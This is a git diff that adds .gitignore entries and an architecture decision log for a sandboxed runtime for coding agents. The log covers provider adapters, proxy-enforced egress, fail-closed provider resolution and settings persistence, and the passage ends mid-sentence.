diff --git a/.gitignore b/.gitignore index f80b86e..05d8523 100644 --- a/.gitignore +++ b/.gitignore @@ -62,3 +62,41 @@ safetypluginclone/.claude/.state/ # Local refactor checklist refactor-plan.md + +# GSD runtime/state noise (keep curated project docs + milestone docs committed) +.gsd/STATE.md +.gsd/activity/ +.gsd/auto.lock +.gsd/completed-units.json +.gsd/completed-units-*.json +.gsd/event-log.jsonl +.gsd/gsd.db +.gsd/gsd.db-* +.gsd/journal/ +.gsd/metrics.json +.gsd/OVERRIDES.md +.gsd/PREFERENCES.md +.gsd/recovery/ +.gsd/reports/ +.gsd/runtime/ +.gsd/state-manifest.json +.gsd/worktrees/ +.bg-shell/ +coverage.json +READMEGSD.md + +# ── GSD baseline (auto-generated) ── +.gsd-id +*.code-workspace +.env +.env.* +!.env.example +node_modules/ +.next/ +*.pyc +target/ +vendor/ +*.log +coverage/ +.cache/ +tmp/ diff --git a/.gsd/DECISIONS.md b/.gsd/DECISIONS.md new file mode 100644 index 0000000..f5d654e --- /dev/null +++ b/.gsd/DECISIONS.md @@ -0,0 +1,168 @@ +# DECISIONS.md + +This file is append-only. Record new decisions as new entries. + +--- + +## D-001 — Product identity +SCC means **Sandboxed Code CLI**. + +Status: superseded by D045 + +--- + +## D-002 — Product center +SCC is a governed runtime for coding agents, not a new coding agent. + +Status: accepted + +--- + +## D-003 — Implementation root +All architecture work happens in `scc-sync-1.7.3`. The dirty `scc` tree is archival only. + +Status: accepted + +--- + +## D-004 — Backward compatibility stance +There are no active users, so core code will not carry long-term backward-compatibility aliases after the one-time migration. + +Status: accepted + +--- + +## D-005 — First-class providers +V1 supports Claude Code and Codex only. Other providers remain out of scope until the new core is stable. + +Status: accepted + +--- + +## D-006 — Runtime strategy +Portable OCI comes first. Docker Desktop is optional and not foundational. + +Status: accepted + +--- + +## D-007 — Network widening policy +Only org policy and delegated team policy may widen effective egress. Projects and users may only narrow. + +Status: accepted + +--- + +## D-008 — Enforced network scope +V1 enforced egress is HTTP/HTTPS-focused only. + +Status: accepted + +--- + +## D-009 — Runtime safety scope +The first cross-agent safety layer governs destructive git plus explicit network tools. + +Status: accepted + +--- + +## D-010 — Skills portability +Open Agent Skills are the only intended shared portability surface. + +Status: accepted + +--- + +## D-017 — M004 safety architecture must stay narrow and truthful +For M004/S02–S05: wrapper scope is exactly 7 tools (destructive git + 6 explicit network tools). Wrappers are defense-in-depth, UX, and audit — never claim they are the primary enforcement plane. Topology + proxy policy remain the hard network control. Provider-native integrations are adapter-owned and additive only. One active team context per session. M004 maintainability stays local to touched files. Supersedes no prior decision but constrains D-009 scope for M004 implementation. + +Status: accepted + +--- + +## D-018 — Governed artifacts are canonical; plugins, rules, hooks, and instruction files are render targets +SCC should keep one provider-neutral governed-artifact catalog plus bundle model for org/team/project/user policy. Open Agent Skills are the primary shared workflow surface. MCP definitions remain provider-neutral where possible. Provider-native hooks, marketplace entries, `.codex-plugin/plugin.json`, `.mcp.json`, `.app.json`, `.codex/rules/*.rules`, `.codex/hooks.json`, `AGENTS.md`, `CLAUDE.md`, and similar files are adapter-owned render targets, not the canonical policy model. Teams should enable approved bundles once and switch providers without maintaining dual team configs. When a provider lacks a native surface, SCC applies the shared parts and reports skipped native bindings truthfully instead of inventing fake parity. + +Status: accepted + +--- + +## D-019 — Claude and Codex native plugin surfaces are intentionally asymmetric +SCC must not model Claude and Codex as if they share one plugin schema. Claude plugins may carry skills, agents, hooks, MCP servers, LSP config, and plugin settings. Codex plugins bundle skills, apps, and MCP, while rules, hooks, `config.toml`, marketplace catalogs, and `AGENTS.md` layering remain separate native surfaces. Functional parity means one approved SCC bundle produces the closest truthful native projection per provider. It does not mean one physical plugin directory can or should be reused unchanged across providers. + +Status: accepted + +--- + +## D-020 — One team pack source, generated native distributions +The preferred DX and maintainability model is one approved SCC bundle source per team pack, not one provider marketplace as the canonical input. Team policy should reference approved bundle IDs. SCC should fetch the pinned bundle source, then render the required Claude or Codex native outputs locally. If the organization wants direct native installation outside SCC, generated Claude/Codex marketplace artifacts may be published as build outputs from the same source repository. + +Status: accepted + +--- + +## D045 — Product naming refinement +SCC means **Sandboxed Coding CLI**. + +This supersedes D030's "Sandboxed Code CLI" wording. Use "Sandboxed Coding CLI" +across current user-facing surfaces, package metadata, branding, and active +project docs. Historical milestone artifacts may retain older wording as +execution history unless they are part of current user-facing product surfaces +or active architecture docs. + +Status: accepted + +--- + +## Decisions Table + +| # | When | Scope | Decision | Choice | Rationale | Revisable? | Made By | +|---|------|-------|----------|--------|-----------|------------|---------| +| D001 | M001/S04 | architecture | How M001 introduces the provider-neutral typed seams for launch, runtime, network, safety, and audit planning. | Add a thin typed contract layer in `src/scc_cli/core/contracts.py` and a new `AgentProvider` protocol in `src/scc_cli/ports/agent_provider.py`, without migrating the whole launch flow to them in M001. | This establishes the explicit provider-neutral contract surface promised by the milestone while avoiding a destabilizing mid-milestone rewrite of the current Claude-shaped execution path. It gives later milestones concrete typed seams to adopt incrementally instead of keeping the architecture only in plan documents. | Yes | agent | +| D002 | M001/S04 | architecture | How M001 aligns error categories, exit-code mapping, JSON error metadata, and the shared audit-event direction. | Treat `SCCError` subclasses as the canonical source of exit code and category truth, add a stable `ErrorCategory` enum, include `error_category` and `exit_code` in JSON error payloads, and expose `to_audit_event()` as the first shared audit-event mapping helper. | The repo previously relied on mapper special-cases to correct stale exception defaults, which hid drift between exception classes and the published exit-code contract. Making the exception hierarchy authoritative and surfacing category metadata in JSON removes that ambiguity and gives later network and safety work a shared audit-event shape to reuse. | Yes | agent | +| D003 | M002 cross-cutting | architecture | How SCC should prioritize maintainability during milestone planning and implementation. | Treat maintainability as a standing architectural constraint: when touching large or fragile areas, prefer smaller typed modules, explicit seams, composition-root boundaries, and characterization tests before or alongside extraction work. | The user explicitly prioritized maintainability, clean architecture, and clean code. Making this a first-class architectural rule improves testability, consistency, and change safety while reinforcing existing typed-contract and adapter-boundary decisions. | Yes | collaborative | +| D004 | Post-S03 planning guidance for all remaining M002 work | architecture | How maintainability, clean architecture, and PEP 8 discipline should guide all future milestone and slice work. **Superseded in part by D011 for post-M002 milestone sequencing and maintainability staging.** | Apply PEP 8 style, clean architecture boundaries, maintainability-first decomposition, and robust error handling as default implementation policy across all phases; when touching large or high-churn files, prefer small typed extractions and clearer module boundaries even if it requires additional scoped work. **D011 narrows the post-M002 plan so repo-wide decomposition, guardrail restoration, xfail removal, and other broad hardening work stay in M005, while M003/M004 remain limited to slice-local extractions.** | The user explicitly wants cleaner, more maintainable code over minimal-change delivery. Reinforcing maintainability as a standing execution rule aligns with R001 and D003, reduces future change risk, improves testability and readability, and encourages reliable error handling plus smaller, easier-to-understand modules instead of further monolith growth. | Yes | human | +| D005 | M002/S03 | provider | How Codex should be represented on the shared AgentProvider seam in M002 | Model Codex as a file-configured provider with argv `('codex',)`, required destination set `openai-core`, artifact-path-owned settings, and no resume, skills, or native integrations until those capabilities are actually implemented. | This keeps ProviderCapabilityProfile honest, avoids leaking Codex-specific fields into shared launch contracts, and proves the launch seam supports a second real provider without reintroducing Claude-shaped core assumptions. | Yes | agent | +| D006 | M002/S04 planning | architecture | How S04 should scope pre-launch validation and the first durable audit sink | Implement S04 preflight as provider-neutral validation over the current launch contracts (`AgentLaunchSpec.required_destination_sets`, selected network policy, and launch-plan readiness) and persist launch/preflight `AuditEvent` records to one local append-only JSONL sink behind a dedicated port/adapter reused by every live start path. | Current SCC code already exposes the provider requirement names and effective network policy needed for an honest early gate, but it does not yet model a full destination-allowlist control plane or enterprise audit export. A local JSONL sink satisfies the milestone’s structured and durable audit requirement without inventing a second event schema, while keeping the implementation small, testable, and extendable for later milestones. | Yes | agent | +| D007 | M002/S04 | architecture | How live launch entrypoints should consume preflight validation and durable audit wiring in M002/S04 | Route both `scc start` and worktree auto-start through the shared `src/scc_cli/commands/launch/dependencies.py` builder sourced from `bootstrap.py`, and require both paths to finish through `finalize_launch(...)` rather than constructing `StartSessionDependencies` inline or calling `start_session(...)` directly. | S04 introduced a provider-neutral preflight gate and durable `AuditEvent` sink that only stay honest if every live launch path uses the same composition-root wiring and the same boundary. Centralizing the dependency builder keeps `bootstrap.py` as the sole adapter import boundary, reduces duplicated launch wiring, preserves team-context propagation for worktree auto-start, and guarantees blocked launches and audit persistence failures fail closed before runtime startup in both entrypoints. | Yes | agent | +| D008 | M002/S05 planning | architecture | How S05 should expose durable launch diagnostics while reducing duplicated support-bundle logic | Add an application-owned launch-audit reader surfaced via `scc support launch-audit`, include redacted recent launch audit context in support bundles, and route support-bundle generation through the application layer instead of the legacy top-level helper. | S04 created a durable local launch audit sink but no bounded operator-facing inspection surface. Leaving diagnostics split between the new application support-bundle use case and the legacy top-level `support_bundle.py` helper would preserve root sprawl and allow redaction or manifest behavior to drift. A single application-owned diagnostics path gives maintainers one source of truth, keeps audit inspection redaction-aware and bounded, and advances R001 by shrinking duplicated launch/support code. | Yes | agent | +| D009 | M002/S05/T03 | architecture | Where the interactive launch wizard should keep quick-resume and workspace-resume orchestration after S05/T03 | Keep top-level quick-resume and workspace-resume subflows in `src/scc_cli/commands/launch/wizard_resume.py`, pass explicit `WizardResumeContext` inputs from `interactive_start`, and guard the boundary with `tests/test_launch_flow_hotspots.py` so nested resume helpers do not grow back into `flow.py`. | `interactive_start` was the largest remaining launch-flow hotspot. Moving the resume branches into a focused command-layer helper module reduces local complexity without changing launch semantics, while explicit typed context preserves the existing `--team` over `selected_profile` precedence and makes malformed answer handling testable. The hotspot guardrail makes the maintainability gain durable instead of depending on convention. | Yes | agent | +| D010 | M002/S05 | requirement | R001 | validated | M002/S05 reduced two active maintainability hotspots in touched launch/support code by moving quick-resume and workspace-resume orchestration into typed helpers (`wizard_resume.py`), converging CLI and settings support-bundle generation on one application-owned implementation, removing the legacy root helper, and adding focused characterization/guardrail coverage (`test_launch_flow_hotspots.py`, support/settings/root-sprawl tests). Slice verification and repo-wide gates passed in the worktree (`uv run ruff check`, `uv run mypy src/scc_cli`, `uv run pytest --rootdir "$PWD" -q`). | Yes | agent | +| D011 | M002/S05 override follow-through | roadmap | How milestone sequencing and maintainability staging should proceed after M002 closes | Keep the milestone order `M002 -> M003 -> M004 -> M005`; do not start M005 next. Register or confirm M003 and M004 from `PLAN.md`, run M003 before M004, keep M005 as the final quality-bar milestone, and limit M003/M004 maintainability work to local extractions that directly enable the active slice while reserving repo-wide decomposition, typed-config migration, guardrail restoration, xfail removal, and the broad coverage campaign for M005. | The override changes execution order and the definition of what post-M002 maintainability work is allowed to pull forward. Recording it as an architectural roadmap decision keeps project, requirements, and milestone handoff documents aligned and prevents closeout or reassessment work from incorrectly promoting M005 ahead of the runtime and safety milestones. | Yes | human | +| D012 | M003/S01 | architecture | How runtime detection should be structured and consumed in M003 and beyond | Introduce a RuntimeProbe protocol with a single probe() -> RuntimeInfo method. DockerRuntimeProbe is the sole adapter calling docker/core helpers. DockerSandboxRuntime accepts a RuntimeProbe in __init__ and its ensure_available() inspects RuntimeInfo fields instead of calling docker.check_docker_available() directly. Bootstrap shares one probe instance between sandbox_runtime and runtime_probe fields. A tokenizer-based guardrail test prevents future direct check_docker_available() calls outside the adapter layer. | This replaces name-only heuristics with typed capability detection, keeps docker-specific knowledge in one adapter boundary, and establishes the RuntimeInfo-driven pattern that S02 (OCI backend) and S03 (egress topology) depend on for portable runtime selection. | Yes | agent | +| D013 | M003/S02 | architecture | How the OCI sandbox backend is introduced alongside the existing Docker Desktop sandbox path | Add OciSandboxRuntime as a parallel SandboxRuntime adapter (not a replacement). Bootstrap selects between DockerSandboxRuntime and OciSandboxRuntime based on RuntimeInfo.preferred_backend from the probe. Docker Desktop sandbox path remains the default when sandbox is available. OCI backend uses docker create/start/exec with explicit volume mounts for credential persistence. Image selection is driven by preferred_backend: SANDBOX_IMAGE for docker-sandbox, SCC_CLAUDE_IMAGE_REF for oci. | Constitution §3 prohibits Docker Desktop as a hard dependency. The OCI backend makes SCC work on Docker Engine, OrbStack, and Colima without changing the existing Desktop path. Parallel adapters behind the same protocol keeps risk contained — the Desktop path is untouched. Bootstrap-level selection via probe results means no runtime surprise for users. Credential handling differs fundamentally between backends (symlink pattern vs volume mount), so sharing a single adapter would create accidental coupling. | Yes | agent | +| D014 | M003/S03 | architecture | How web-egress enforcement is implemented in the OCI adapter | Build a NetworkTopologyManager adapter that creates internal-only Docker networks and a Squid proxy sidecar as the sole external bridge. The OCI adapter orchestrates topology: for web-egress-enforced, it creates the internal network, starts the proxy with compiled ACLs, and attaches the agent container to the internal network only. For locked-down-web, the agent gets --network=none. ACL compilation is a pure function in core/egress_policy.py that converts NetworkPolicyPlan into Squid ACL config. Default deny rules cover IP literals, loopback, private CIDRs, link-local, and metadata endpoints. The Docker Desktop sandbox path (DockerSandboxRuntime) is unchanged — Desktop has its own network isolation. | Constitution §4 requires security language to match actual enforcement — the existing code only set proxy env vars without any topology isolation. Squid is mature, handles HTTPS CONNECT natively, and has well-understood ACL semantics for host + IP/CIDR matching. Separating ACL compilation (pure logic) from topology management (subprocess calls) from adapter integration (OciSandboxRuntime) keeps each piece testable in isolation. The internal-only Docker network is the hard enforcement boundary — even if the agent ignores proxy env vars, it physically cannot reach external networks without going through the proxy. | Yes | agent | +| D015 | M003/S04/T03 | governance | How the enterprise egress model is articulated and verified for the remainder of M003 | Keep the enterprise egress model explicit throughout M003: web-egress-enforced is the normal cloud-provider enterprise mode; locked-down-web is an intentional no-web / no-cloud-launch posture unless a future local-model path exists. Org owns baseline mode, hard deny overlays, named destination sets, and delegation. Teams may widen only within delegated bounds. Project/user scopes may narrow only. Every workspace/session has exactly one active team context; users switch context between teams — do not implicitly union team allowlists. Diagnostics must show active team context, effective destination sets, runtime backend, network mode, and clear blocked reasons. Topology plus proxy policy remain the hard control; wrappers are defense-in-depth, UX, and audit only. Reinforces and extends D015. | User override during M003/S04/T03 to ensure the governance model is unambiguous in all remaining planning documents, verification criteria, and documentation. D015 established the governance composition rules; this decision makes mode semantics (web-egress-enforced vs locked-down-web), diagnostic surface requirements, and the single-team-context invariant fully explicit so S05 verification and docs truthfulness work against a clear contract. | Yes | human | +| D016 | M004/S01 | architecture | How S01 handles SafetyPolicy.rules typing and rule-enablement checking | Keep `SafetyPolicy.rules` as `dict[str, Any]` (existing frozen dataclass). Add standalone `_matched_rule_to_policy_key()` mapping function in `core/safety_engine.py` and use `policy.rules.get(key, True)` for fail-closed rule enablement checking. Do not add a `SafetyRule` typed model in M004/S01. | SafetyPolicy is an existing frozen dataclass used across test_core_contracts.py and other test code. Changing `rules` to a stricter type would break existing tests and require migration. A standalone mapping function achieves the same fail-closed semantics without breaking the contract surface. A typed SafetyRule model can be introduced in a later slice if needed. | Yes | agent | +| D017 | M005/S02/T06 | roadmap | How M005/S03-S06 should be scoped after S02 decomposition completes | Replan S03-S06 to explicitly incorporate the governed-artifact/team-pack architecture. S03 must land typed GovernedArtifact/ArtifactBundle/ArtifactRenderPlan models and typed config flow — not generic strict-typing cleanup. S04 must harden fetch/render/merge/install failure handling for the provider-native renderer pipeline. S06 must validate docs/diagnostics truthfulness for the team-pack model. Generic strict-typing and error-handling work is still in scope but subordinate to the team-pack architecture. One approved SCC team-pack source is canonical; team config references bundle IDs not raw marketplace URLs; split provider-neutral planning from provider-native renderers; Claude and Codex native surfaces are asymmetric; do not bolt Codex onto the Claude-shaped marketplace pipeline; render per-provider native outputs from the same bundle plan; do not require dual team configs. | User overrides during M005/S02/T06 directed that S03-S06 must not proceed as generic quality cleanup. The governed-artifact/team-pack architecture from D018-D020, specs/03-provider-boundary.md, and specs/06-governed-artifacts.md must be the organizing principle for remaining M005 work. This ensures the architecture quality milestone actually delivers the provider-neutral bundle model instead of treating it as optional future work. | Yes | human | +| D018 | M005/S03 | architecture | Whether to include wizard cast() cleanup (23 casts across wizard.py and flow_interactive.py) in S03 | Defer wizard cast cleanup to future work. S03 focuses on the governed-artifact model hierarchy and NormalizedOrgConfig adoption. The wizard cast pattern is type-unsafe but functionally correct — it does not block the typed config flow, and refactoring the wizard state machine is a significant effort with high blast radius touching all wizard tests. | D017 scopes S03 to the governed-artifact/team-pack typed model adoption and config flow typing. The wizard casts are a separate concern (interaction dispatch, not config models) and the refactor risk is high relative to the benefit. The cast pattern works; it just loses generic type parameters. | Yes — can be added to S06 or a future milestone | agent | +| D021 | M005/S03/T05 — before execution | roadmap | How to handle S03 completion and S04-S06 replanning for governed-artifact/team-pack architecture | Close S03 with T01-T04 complete (governed-artifact types + NormalizedOrgConfig adoption). Drop T05 (safety_policy_loader typing — already under target at 382 dict[str,Any] refs; the small conversion can be folded into future work). Replan S04 as provider-neutral artifact planning pipeline + provider-native renderers with hardened failure handling. Replan S05 as coverage on governed-artifact/team-pack planning and renderer seams. Replan S06 as diagnostics/docs truthfulness for the team-pack model and rendered native surfaces. | User override: S03-S06 must be replanned around the governed-artifact/team-pack architecture (D017-D020, specs/03, specs/06) before any further generic implementation. The T05 safety_policy_loader typing is acceptable cleanup but not architecturally significant — the slice already met its dict[str,Any] reduction target (382 < 390). The real remaining work is building the provider-neutral bundle planning pipeline and provider-native renderers, not more incremental typing conversions. S04-S06 as currently planned are generic quality cleanup that do not incorporate the team-pack architecture. | No — user directed | collaborative | +| D022 | M005/S04 — before execution | roadmap | How to fix D019 ID collision and tighten S04/T05 fallback language before S04 execution | Reassign the S03 closeout/S04-S06 replan decision from D019 to D021 (next free ID) to eliminate the collision with D-019 (asymmetric plugin surfaces). Update all references in PROJECT.md, S03 summaries/assessment, OVERRIDES.md, and the DECISIONS table. Tighten S04/T05 so the bundle/team-pack pipeline is the canonical artifact path — the old Claude-shaped marketplace pipeline is not preserved as a long-lived fallback in core. Any short-term migration shim must be explicitly adapter-local, inside claude_agent_provider.py only, clearly marked transitional, and must not leak marketplace-shaped assumptions into core, ports, or the AgentProvider protocol. | User directed two alignment fixes before S04 execution: (1) D019 was reused — the heading block D-019 is an architecture decision about asymmetric surfaces, while the DB row D019 was the replan roadmap decision; moving the replan to D021 resolves the collision. (2) T05's original language ("existing marketplace pipeline continues to work as a fallback") contradicted the team-pack architecture intent from D017-D020/specs/06; the bundle pipeline must be canonical, not a parallel path with a long-lived Claude-shaped fallback in core. | No — user directed | human | +| D023 | M005/S04 — accepted as post-T04 architecture gap to fix before S04 closure | architecture | How to handle shared/portable artifacts (skills, MCP servers) that appear in effective_artifacts but have no provider-specific bindings | Renderers must be able to render shared artifacts from effective_artifacts without requiring provider-specific bindings — they cannot only consume plan.bindings | User direction: shared skills and shared MCP artifacts must be renderable from the governed-artifact plan without requiring provider-specific bindings. Currently they only appear in effective_artifacts while renderers consume only plan.bindings, leaving them unrendered. | Yes | human | +| D024 | M005/S04 — accepted as architecture gap to fix in T03 rework or new tasks before S04 closure | architecture | Whether Codex renderer should write real Codex-native surfaces or only SCC metadata placeholders | Codex renderer must project to real Codex-native surfaces per specs/03 and specs/06: real local plugin folder rooted by .codex-plugin/plugin.json, real .codex/rules/*.rules outputs, deterministic merge strategy for .codex/hooks.json, and the intended Codex instruction layer — not only .codex/.scc-managed metadata | User direction: do not leave renderer at metadata-placeholder level; it must produce artifacts that Codex actually consumes. The current implementation writes SCC metadata JSON files as references but does not produce the native surface files themselves. | Yes | human | +| D025 | M005/S04/T05 — accepted as T05 scope direction | architecture | Whether T05 should wire resolve_render_plan + provider render_artifacts through AgentProvider/start_session, replacing old marketplace sync | T05 must wire resolve_render_plan plus provider render_artifacts through the AgentProvider/start_session path so bundle-based teams do not still depend on the old Claude-shaped marketplace sync as the effective path. Any temporary Claude fallback must be adapter-local and explicitly transitional only. | User direction: bundle pipeline must be the canonical path for governed teams, not a parallel path alongside the legacy marketplace sync. Temporary Claude fallback is acceptable only if adapter-local and marked transitional. | Yes | human | +| D026 | M006-d622bc | architecture | How provider selection flows from user intent to runtime wiring | Add a selected_provider field to user config (default: 'claude'), a --provider flag on scc start, and scc provider show/set commands. A resolve_active_provider() function in core resolves CLI flag > config > default. Bootstrap uses the resolved provider to dispatch agent_provider, agent_runner, and safety_adapter. Provider-specific constants (image ref, config dir, agent binary name, display name) live on the ProviderCapabilityProfile or a companion ProviderConstants dataclass, not as module-level globals. | This gives users three levels of control (default, config, flag) with clear precedence. Keeping provider dispatch in bootstrap preserves the existing composition-root pattern. Moving provider-specific constants off module globals into the provider's capability profile ensures adding a third provider requires only a new adapter, not a sweep through constants.py. | Yes | collaborative | +| D027 | M006-d622bc | architecture | Whether to introduce ProviderRuntimeSpec as a separate model from ProviderCapabilityProfile | Add ProviderRuntimeSpec as a frozen dataclass carrying image_ref, binary_name, config_dir, settings_path_template, data_volume, display_name, and auth_mount_paths. CapabilityProfile stays truth-only metadata (provider_id, display_name, supports_resume, supports_skills, etc.). The runtime spec lives on the provider adapter and is surfaced to start_session and OCI runtime via bootstrap dispatch. | CapabilityProfile answers 'what can this provider do?' — it is consumed by planning, diagnostics, and UI. RuntimeSpec answers 'how do we run this provider?' — it is consumed by start_session, OCI runtime, and container creation. Mixing them would force planning code to import runtime details it doesn't need, and would make CapabilityProfile mutable as runtime requirements change. Keeping them separate follows the existing separation between planning (AgentProvider.capability_profile) and execution (AgentProvider.prepare_launch). | Yes | collaborative | +| D028 | M006-d622bc | architecture | Five M006 execution constraints: policy validation, request-scoped resolution, machine-readable provider output, standardized image build commands, and coexistence testing | 1. Provider selection must be validated against org/team policy early in the launch path, with typed ProviderNotAllowedError if a team/org config restricts available providers. 2. Provider resolution is request-scoped: shared infra (probe, engine, sink) stays cached in bootstrap, but provider-specific adapters (runner, provider, safety adapter, runtime spec) are selected per invocation via resolve_active_provider() called from the start command, not baked into the lru_cached DefaultAdapters singleton. 3. provider_id must appear in dry-run JSON, support bundle, audit events, session list --json output, and container list output. 4. For missing provider images, doctor and start must print the exact build command: `docker build -t scc-agent-{provider}:latest images/scc-agent-{provider}/`. No scc images build/list command in v1 — operator builds directly. 5. S04 must include a coexistence test proving Claude and Codex containers, volumes, sessions, and Quick Resume entries can both exist for the same workspace without collision. | These five constraints close the gaps between 'provider selection exists' and 'provider selection is production-ready'. Policy validation prevents shadow provider switching that violates org intent. Request-scoped resolution prevents the lru_cache from locking the first provider choice for the process lifetime. Machine-readable output ensures automation and support tooling can consume provider info. Standardized image commands give operators a predictable recovery path. Coexistence testing proves the identity separation actually works. | Yes | collaborative | +| D029 | M007-cqttot | architecture | What should be the single source of truth for provider runtime details (image ref, binary name, config dir, settings path, data volume, display name, default argv)? | Introduce a ProviderRuntimeSpec frozen dataclass and a PROVIDER_REGISTRY dict in core/provider_resolution.py. Replace the 5 scattered dicts across start_session.py, dependencies.py, and provider_resolution.py with registry lookups. ProviderRuntimeSpec carries image_ref, binary_name, config_dir, settings_path, data_volume, display_name, and default_argv. Adding a third provider requires one new ProviderRuntimeSpec entry, not edits to 4 modules. | Currently provider data is scattered across _PROVIDER_IMAGE_REF, _PROVIDER_DATA_VOLUME, _PROVIDER_CONFIG_DIR (start_session.py), _PROVIDER_DISPATCH (dependencies.py), and _PROVIDER_DISPLAY_NAMES (provider_resolution.py). This creates drift risk and makes adding a provider expensive. A single typed registry with one dataclass per provider is the smallest consolidation that eliminates drift without building a framework. Constitution §7 prefers typed contracts over loose dictionaries. | Yes | collaborative | +| D030 | M007-cqttot | architecture | What is the canonical product name for SCC? | SCC — Sandboxed Code CLI. Update D-001 which says 'Sandboxed Coding CLI' to match the actual codebase usage of 'Sandboxed Code CLI'. Apply consistently across README, CLI branding, docs, and all user-facing surfaces. | The codebase already uses 'Sandboxed Code CLI' in branding.py, theme.py, cli.py, setup_ui.py, errors.py, and init.py. The README still says 'Sandboxed Claude CLI'. D-001 says 'Sandboxed Coding CLI'. Three different names creates confusion. 'Sandboxed Code CLI' is already dominant in the codebase and provider-neutral. | Yes | collaborative | +| D031 | M007-cqttot planning refinement | architecture | Resolve the D027 vs D029 contradiction: where does ProviderRuntimeSpec live and who owns the registry? | ProviderRuntimeSpec is a typed model defined in core/contracts.py (where ProviderCapabilityProfile already lives). The PROVIDER_REGISTRY that maps provider_id → ProviderRuntimeSpec lives in commands/launch/dependencies.py (the composition/dispatch layer), not in core/provider_resolution.py. Core defines the shape; the dispatch layer owns the concrete entries. This supersedes D029's placement of the registry in core and aligns with D027's intent that runtime spec data is surfaced through bootstrap dispatch, not owned by shared core. get_provider_display_name() in core/provider_resolution.py becomes a thin lookup that accepts a ProviderRuntimeSpec or provider_id, but does not own the registry itself. | D027 correctly identified that runtime spec is execution data, not planning data — it answers 'how do we run this provider' not 'what can this provider do.' Core should define the typed contract but not own the concrete provider entries, because that would make core the authority on provider-specific runtime details (image refs, binary names, config dirs) — violating Constitution §6 which says provider-specific behavior belongs in adapters. The dispatch layer (dependencies.py) already owns _PROVIDER_DISPATCH and is the natural home for a typed PROVIDER_REGISTRY. This keeps core provider-agnostic while giving the dispatch layer one consolidated typed table instead of 5 scattered dicts. | Yes | collaborative | +| D032 | M007-cqttot planning refinement | architecture | How should unknown, forbidden, or unavailable providers behave in active launch logic? | Fail closed. Unknown provider_id in the launch path raises a typed error (InvalidProviderError), never silently falls back to Claude. Forbidden providers raise ProviderNotAllowedError (existing). Unavailable providers (missing image, missing config) raise ProviderNotReadyError. Silent Claude fallback is permitted only at migration/read boundaries: old SessionRecord.provider_id=None defaults to 'claude' during deserialization, old config with no selected_provider defaults to 'claude' during config read. The launch path, OCI runtime, and dispatch layer must never substitute Claude for an unrecognized provider_id. | Silent fallback to Claude on unknown providers is a security gap in governed environments: an org that restricts providers to codex-only would have their restriction silently bypassed if someone passes provider_id='typo'. It also makes debugging harder — a Codex user who gets Claude behavior has no error message to diagnose. Fail-closed is the correct default for a governed runtime (Constitution §5, least privilege by default). Legacy compat at deserialization boundaries is acceptable because it affects display/history, not active launch decisions. | Yes | collaborative | +| D033 | M007-cqttot planning | architecture | How SCC should launch Codex CLI inside the hardened SCC container | Launch Codex with `codex --dangerously-bypass-approvals-and-sandbox` (equivalently `--yolo`) inside the SCC container. SCC's container-level isolation (internal-only Docker network, Squid proxy sidecar, safety wrappers) is the hard enforcement boundary — Codex's built-in OS-level sandbox (Seatbelt/Landlock) is redundant inside a Docker container and can interfere with legitimate agent operations. This mirrors the Claude pattern where `--dangerously-skip-permissions` defers to SCC's external sandbox. The flag is runner-owned (CodexAgentRunner.build_command), not part of ProviderRuntimeSpec. | Codex's built-in sandbox uses OS-level mechanisms (macOS Seatbelt, Linux Landlock/seccomp) that are designed for bare-metal execution. Inside a Docker container, these mechanisms are either unsupported, redundant, or actively interfere with operations the container already restricts. SCC's enforcement model is container-level: internal-only network, proxy-enforced egress, safety wrappers, and volume isolation. Running Codex's own sandbox inside SCC's sandbox creates confusing double-enforcement with no security benefit. The official Codex docs explicitly recommend `--sandbox danger-full-access` when running in Docker. Making this decision explicit prevents future confusion about which sandbox layer is authoritative. | Yes | collaborative | +| D034 | M007-cqttot planning refinement | architecture | Where should the PROVIDER_REGISTRY live for neutral cross-cutting access? | Create a new module `src/scc_cli/provider_registry.py` at the top of the package (same level as bootstrap.py, sessions.py). It contains the ProviderRuntimeSpec entries and a get_runtime_spec(provider_id) fail-closed lookup. This is accessible to commands/launch/dependencies.py, doctor, sessions, support_bundle, and any future provider tooling without circular imports or layer violations. ProviderRuntimeSpec (the type) stays in core/contracts.py. The registry module imports from core but is not part of core — it is composition-layer infrastructure like bootstrap.py. | D031 correctly identified that core should not own the registry, but placing it in commands/launch/dependencies.py (as D031 proposed) creates an access problem: doctor, sessions, support_bundle, and audit also need runtime specs and would have to import from a launch-command module, violating layering. A top-level provider_registry.py is the simplest solution — it sits at the composition layer alongside bootstrap.py (which already owns adapter wiring), is importable by any consumer, and carries no command-layer or adapter-layer coupling. It is not 'core' — it contains concrete provider data, not abstract contracts. | Yes | collaborative | +| D035 | M007-cqttot planning | architecture | How should provider settings be serialized and injected into the container? | Change AgentSettings from `content: dict[str, Any]` + `path: Path` to `rendered_bytes: bytes` + `path: Path` + `suffix: str`. AgentRunner.build_settings() becomes responsible for serializing the config dict into the correct format (JSON for Claude, TOML for Codex, whatever for future providers) and returning pre-rendered bytes. The OCI runtime's _inject_settings() writes rendered_bytes verbatim via docker cp — it no longer calls json.dumps(). This makes the sandbox runtime format-agnostic. | The current AgentSettings carries `content: dict[str, Any]` and the OCI runtime calls `json.dumps()` on it. This bakes a JSON assumption into infrastructure code that should be provider-agnostic. Codex uses TOML config (config.toml), not JSON. Future providers may use YAML, INI, or other formats. Making the runner responsible for serialization follows the existing AgentRunner protocol pattern — the runner already owns command construction (build_command) and settings path selection. Serialization is the natural companion. The change is small: ~15 lines in AgentSettings, ~5 lines in each runner, ~5 lines in OCI runtime. | Yes | collaborative | +| D036 | M007-cqttot planning refinement | architecture | What is the provider state persistence model for containerized agents in SCC v1? | V1 uses one Docker named volume per provider (docker-claude-sandbox-data, docker-codex-sandbox-data) mapped to the provider config dir (/home/agent/.claude, /home/agent/.codex). The entire provider home persists between containers. This is intentional and correct for v1: auth tokens survive restarts, session history enables resume, and provider-native config/plugins persist. SCC-managed launch config (settings injected via docker cp) is ephemeral by nature — it overwrites the settings file in each fresh container. A finer-grained persistence model (auth-only volume, ephemeral config tmpfs) is deferred to a future milestone when enterprise data-retention policies require it. Auth files must have strict permissions: directory 0700, files 0600, owned by agent (uid 1000). scc-base Dockerfile sets these permissions at image build time. | Splitting the volume into auth-only vs ephemeral partitions would require custom entrypoint scripts, multiple volume mounts, and complex lifecycle management — all for a problem that doesn't exist yet. The current model already handles the critical concern (auth persistence) and the secondary concern (SCC config freshness — docker cp overwrites on each launch). Enterprise data-retention refinement is a real future need but belongs in a separate milestone focused on operator controls for session/history/transcript retention. Over-engineering persistence now would delay the actual M007 deliverables (fail-closed resolution, settings format fix, provider 